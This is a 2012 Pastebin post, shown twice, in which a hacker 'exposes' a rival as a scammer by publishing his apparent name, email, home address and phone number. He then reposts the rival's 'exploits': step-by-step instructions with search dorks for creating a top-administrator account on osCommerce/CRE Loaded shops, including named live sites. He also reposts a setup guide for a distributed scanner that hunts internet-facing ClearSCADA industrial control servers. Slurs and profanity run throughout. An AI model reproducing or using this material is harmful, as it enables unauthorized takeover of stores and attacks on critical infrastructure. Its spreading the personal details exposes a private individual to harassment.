Don't like ads? PRO users don't see any ads ;-)

Hex00010 Scammer! (Includes DoX + Exploits)

By: Reck on May 24th, 2012 | syntax: None | size: 6.65 KB | hits: 3,790 | expires: Never

download | raw | embed | report abuse | print

Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)

Hello there, world.
So, Hex00010 got kicked outta TeamP0isoN for buttfuckin' horny chicks in a Burger King's Bathroom, Just kidding, He got kicked out of TeamP0isoN for continously scamming people.
---------Hex000101's DoX (http://pastebin.com/zNmFmm59)-------
Name: William Premore
Email: [email protected]
Address: 321 W Forest Pittsburg, KS 66762
Tel: +14177936577
-----------------------------------------------------------------------------------
He's selling exploits, do not BUY from him. He has scammed 20+ people.
He said he got 1337 0day exploits for Scada & OsCommerence, and he said he's selling them.
Such a pathetic liar, isn't he?
Do not BUY shit from him, My friend payed him $250 for the 0day exploits, and he didn't gave him shit, he said he had a shell on a credit-card processing server, he gave him, but it was dead, then my friend started messaging him about it, and he doesn't replies.
Here are his so-called '0day' exploits. Enjoy, folks.
-----------------------------------------------------------------------------
twitter.com/Reckz0r - @Reckz0r - My twitter feed! (Follow for the exposure of cunts)
----------------------------------------------------------------------------
Contact me for the Scada Files for exploiting Scada Websites.
His LR: U0164888
He's a scammer. Do not BUY shit from him.
#FuckScammers
#Pwnage
#OpBangarang
*************************************************************************************
#1 - OsCommerence (He stole this exploit, Original: http://wasimasif.wordpress.com/2010/05/23/oscommerce-security-exploit-allows-access-to-admin-without-password/)
"/*
*
* TeaMp0ison Run's This Shit Nigga
*
* Found By: Hex00010 ~ TeaMp0ison ~ Bitches
*
*
*/
Using Version CRE Loaded PCI B2B v6.4.1
Using Version CRE Loaded Professional v6.3
Copyright © 2008 osCommerce and The Template Shop
2006 CRE Loaded Project
Using Version CRE Loaded v6.2
Using Version CRE Loaded PCI Pro v6.4.1
Using Version CRE Loaded PCI Pro v6.4
The best dork -> intitle:"CRE Loaded 6"
Using Version CRE Loaded v6.2 B2B
inurl:"information.php?info_
id="
"intext:Powered by Oscommerce Supercharged by CRE Loaded"
---------------------------------
Exploit paths:
*admin_members.php/login.php
*administrators.php/login.php
*admin_users.php/login.php
----------------------------
Method:
for example: www.littleelves.com this our target.
we go to: www.littleelves.com/admin/
you will get http://www.littleelves.com/admin/login.php?osCAdminID=80b8cd584fff0a7bb10374446b35987a
Remove "login.php?osCAdminID=80b8cd584fff0a7bb10374446b35987a" and put "admin_members.php/login.php" instead.
after that you will get a page has "TEXT_INFO_HEADING_DEFAULT"
Now add this to the URL: http://www.littleelves.com/admin/admin_members.php/login.php?action=new_member
not we just added "?action=new_member"
after that .. in the same web browser right click then "View source".
Copy the source of the current page. and search for word "post".
you will find the line will be like this:
<form name="newmember" action="http://solarenergyworksstore.com/admin/admin_members.php?action=member_new&page=mID=&osCAdminID=54ebf8c481a5963b75f9e0014503856f" method="post" enctype="multipart/form-data">
Change it to
<form name="newmember" action="http://solarenergyworksstore.com/admin/admin_members.php/login.php?action=member_new&page=mID=&osCAdminID=54ebf8c481a5963b75f9e0014503856f" method="post" enctype="multipart/form-data">
Then fill these options:
TEXT_INFO_FIRSTNAME: admin
TEXT_INFO_LASTNAME: Support
TEXT_INFO_EMAIL: Put your Email here so you can receive the password.
TEXT_INFO_GROUP: Top Administrator
then click on "Insert".
after you clicking Insert. go to your email inbox. you will find a new email "New Password". then you will be able to log in. :)
that's the exploit is all about."
#2 - Scada
"/**
* ClearScada Exploit - Finder - 2012 - DO NOT SHARE
* International SCADA Exploit Finder
* Status: Public
*
* Programmed by: Hex00010
*
*/
Hello everyone
Today i present you with the SCADA Exploit that can find Servers using the ClearSCADA product.
this is a demonstration proof of concept exploit - this exploit is more informational - Unauthentication
it uses a client/server.
this exploit is in response to the SCADA EXPLOITS - Hex00010 - Water - Power Plant located here
http://pastebin.com/SjHSWfkV
Server -> reads 5,000 ip's at a time - once those 5k are up it loads a new set of 5k ( also can run multiple ip's if configured through the server correctly for Parallel Data Processing
opcode 0 - request a server
opcode 1 - the servers result (0 for invalid, 1 for valid)
Opens Port on : 8081
Each server has its own pre-defined ip list
Server Machine 1: host 100mb of ip's
Server Machine 2: host 600mb of ip's
Client Machine 1 -> connects to host 1 - Scans 5k - ends - restarts - if found valid -> print - else - continue - end
Client Machine 2 -> connects to host 1 - Scans 5k - ends - restarts - if found valid -> print - else - continue - end
Each machine scans its own subnet
Supports Server Clustering to maximize scanning times
Supports SSL Scanning
-----------------------------------------------------------------------------------------------------------
Client ->
Reads IP Addresses from the server and displays if there valid or not in a file
Reads Server Header Information
Features:
Server - Pools the clients, Accepts unlimited connections, Queues the server ip list.
Client - Asynchronous processing - Request an ip whilst the other threads are processing. Checks the header for clearscada.
== SETUP ==
In main directory, for the CLIENT
Edit src/ServerConnection.java
Change 127.0.0.1 to the SERVERS ip. Save.
Go back to the parent of src
Make folder bin
javac -d bin src/*.java
== Copy contents of 'bin' to the shells / servers you want to set up the thread on ==
java -Xmx512m ScadaMain [THREADS]
== For the SERVER ==
In the 'Server' directory make bin folder
javac -d bin src/*.java
== Copy contents of bin to the main server ==
[sudo ]java -Xmx2048m Server
--------------------------------------------------------------------------------------------------------------
Run IPGen to generate all of the ip addresses - writes to ip's.txt"
*********************************************************************************
Bitches gonna get exposed.
Don't scam.
Be original.
twitter.com/Reckz0r
Stay tuned for more bullshit.

create a new version of this paste RAW Paste Data

Hello there, world.

So, Hex00010 got kicked outta TeamP0isoN for buttfuckin' horny chicks in a Burger King's Bathroom, Just kidding, He got kicked out of TeamP0isoN for continously scamming people.



---------Hex000101's DoX (http://pastebin.com/zNmFmm59)-------

Name: William Premore 

Email: william.premore@gmail.com

Address: 321 W Forest Pittsburg, KS 66762 

Tel: +14177936577

-----------------------------------------------------------------------------------

He's selling exploits, do not BUY from him. He has scammed 20+ people.

He said he got 1337 0day exploits for Scada & OsCommerence, and he said he's selling them.

Such a pathetic liar, isn't he?

Do not BUY shit from him, My friend payed him $250 for the 0day exploits, and he didn't gave him shit, he said he had a shell on a credit-card processing server, he gave him, but it was dead, then my friend started messaging him about it, and he doesn't replies.

Here are his so-called '0day' exploits. Enjoy, folks.

-----------------------------------------------------------------------------

twitter.com/Reckz0r - @Reckz0r - My twitter feed! (Follow for the exposure of cunts)
----------------------------------------------------------------------------

Contact me for the Scada Files for exploiting Scada Websites.

His LR: U0164888

He's a scammer. Do not BUY shit from him.

#FuckScammers
#Pwnage
#OpBangarang

*************************************************************************************

#1 - OsCommerence (He stole this exploit, Original: http://wasimasif.wordpress.com/2010/05/23/oscommerce-security-exploit-allows-access-to-admin-without-password/)

"/*
*
*       TeaMp0ison Run's This Shit Nigga
*
* Found By:  Hex00010  ~  TeaMp0ison ~ Bitches
*
*
*/
Using Version CRE Loaded PCI B2B v6.4.1
Using Version CRE Loaded Professional v6.3
Copyright © 2008 osCommerce and The Template Shop
2006 CRE Loaded Project
Using Version CRE Loaded v6.2
Using Version CRE Loaded PCI Pro v6.4.1
Using Version CRE Loaded PCI Pro v6.4
The best dork -> intitle:"CRE Loaded 6"
Using Version CRE Loaded v6.2 B2B
inurl:"information.php?info_
id="
"intext:Powered by Oscommerce Supercharged by CRE Loaded"

---------------------------------

Exploit paths:


*admin_members.php/login.php

*administrators.php/login.php

*admin_users.php/login.php

----------------------------

Method:

for example: www.littleelves.com this our target.


we go to: www.littleelves.com/admin/

you will get http://www.littleelves.com/admin/login.php?osCAdminID=80b8cd584fff0a7bb10374446b35987a

Remove  "login.php?osCAdminID=80b8cd584fff0a7bb10374446b35987a" and put "admin_members.php/login.php" instead.

after that you will get a page has "TEXT_INFO_HEADING_DEFAULT"

Now add this to the URL: http://www.littleelves.com/admin/admin_members.php/login.php?action=new_member

not we just added "?action=new_member"

after that .. in the same web browser right click then "View source".

Copy the source of the current page. and search for word "post".

you will find the line will be like this:

<form name="newmember" action="http://solarenergyworksstore.com/admin/admin_members.php?action=member_new&page=mID=&osCAdminID=54ebf8c481a5963b75f9e0014503856f" method="post" enctype="multipart/form-data">


Change it to

<form name="newmember" action="http://solarenergyworksstore.com/admin/admin_members.php/login.php?action=member_new&page=mID=&osCAdminID=54ebf8c481a5963b75f9e0014503856f" method="post" enctype="multipart/form-data">

Then fill these options:

 TEXT_INFO_FIRSTNAME: admin
 TEXT_INFO_LASTNAME: Support
 TEXT_INFO_EMAIL: Put your Email here so you can receive the password.
 TEXT_INFO_GROUP: Top Administrator

then click on "Insert".

after you clicking Insert. go to your email inbox. you will find a new email "New Password". then you will be able to log in. :)

that's the exploit is all about."

#2 - Scada


"/**
 *  ClearScada Exploit   -  Finder - 2012 - DO NOT SHARE
 *  International SCADA Exploit Finder
 *  Status: Public
 *  
 *  Programmed by: Hex00010
 *  
 */

Hello everyone 

Today i present you with the  SCADA Exploit that  can find  Servers   using the  ClearSCADA   product.

this is a demonstration proof of concept exploit - this exploit  is  more  informational - Unauthentication
it uses a  client/server.

this exploit is in response to the  SCADA EXPLOITS - Hex00010 - Water - Power Plant  located here

http://pastebin.com/SjHSWfkV



Server -> reads  5,000 ip's at a  time - once those  5k are up it loads a  new set  of  5k ( also can run multiple ip's if configured through the server correctly for Parallel Data Processing

opcode 0 - request a server
opcode 1 - the servers result (0 for invalid, 1 for valid)

Opens Port on : 8081

Each server  has its own pre-defined  ip list 



Server Machine 1:  host  100mb of  ip's
Server Machine 2:  host  600mb of  ip's



Client Machine 1 -> connects to  host 1  - Scans  5k  - ends  - restarts  - if found valid -> print - else - continue - end

Client Machine 2 -> connects to  host 1  - Scans  5k  - ends  - restarts  - if found valid -> print - else - continue - end

Each machine scans its own subnet 


Supports  Server Clustering  to maximize scanning times 


Supports  SSL  Scanning 

-----------------------------------------------------------------------------------------------------------




Client  ->

Reads IP Addresses from the server  and  displays if there valid or not in a file
Reads  Server  Header Information







Features:
                       
Server - Pools the clients, Accepts unlimited connections, Queues the server ip list.
Client - Asynchronous processing - Request an ip whilst the other threads are processing. Checks the header for clearscada.
== SETUP ==
In main directory, for the CLIENT
Edit src/ServerConnection.java
Change 127.0.0.1 to the SERVERS ip. Save.
Go back to the parent of src
Make folder bin

javac -d bin src/*.java

== Copy contents of 'bin' to the shells / servers you want to set up the thread on ==
java -Xmx512m ScadaMain [THREADS]

== For the SERVER ==
In the 'Server' directory make bin folder
javac -d bin src/*.java

== Copy contents of bin to the main server ==
[sudo ]java -Xmx2048m Server



--------------------------------------------------------------------------------------------------------------


Run IPGen  to generate  all of the ip addresses  - writes to  ip's.txt"

*********************************************************************************

Bitches gonna get exposed.
Don't scam.
Be original.

twitter.com/Reckz0r
Stay tuned for more bullshit.

Pastebin.com Tools & Applications

iPhone/iPad

Windows

Firefox

Chrome

WebOS

Android

Mac

Opera

Click.to

UNIX

WinPhone